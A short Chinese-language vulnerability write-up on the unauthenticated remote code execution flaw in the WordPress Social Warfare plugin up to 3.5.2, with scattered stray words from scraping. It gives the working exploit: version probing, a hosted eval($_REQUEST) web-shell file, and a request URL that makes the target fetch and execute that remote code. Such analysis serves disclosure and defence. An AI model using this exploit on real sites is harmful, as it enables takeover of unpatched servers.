该漏洞只存在于Social Warfare插进的3.5.0、3.5.1和3.5.2版本中,其余版本不存在。php
2019年3月21日插件做者紧急发布了3.5.3版本以修复高危的RCE漏洞,在<=3.5.2版本中存在一处无需登陆便可getshell的RCE漏洞。shell
漏洞分析服务器
在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php文件中有一处eval()函数,该函数将file_get_contents()读取的文件内容当作PHP代码执行致使RCE。函数
漏洞利用post
第一步:刺探是否安装了Social Warfare插件url
访问http://127.0.0.1/wp-content/plugins/social-warfare/readme.txt,若是存在readme.txt文件则说明已经安装该插件,而且从该txt文件中可获知插件的版本。spa
个人本机环境为3.5.2版本。插件
第二步:在本身的VPS服务器上放置一个code.txt文件,并启动HTTP服务使该文件可经过HTTP访问。文件内容以下:debug
<pre>eval($_REQUEST['wpaa'])</pre>
第三步:在未登录任何帐号的状况下直接访问以下连接便可getshell。code
http://127.0.0.1//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://your_ip/code.txt&wpaa=phpinfo();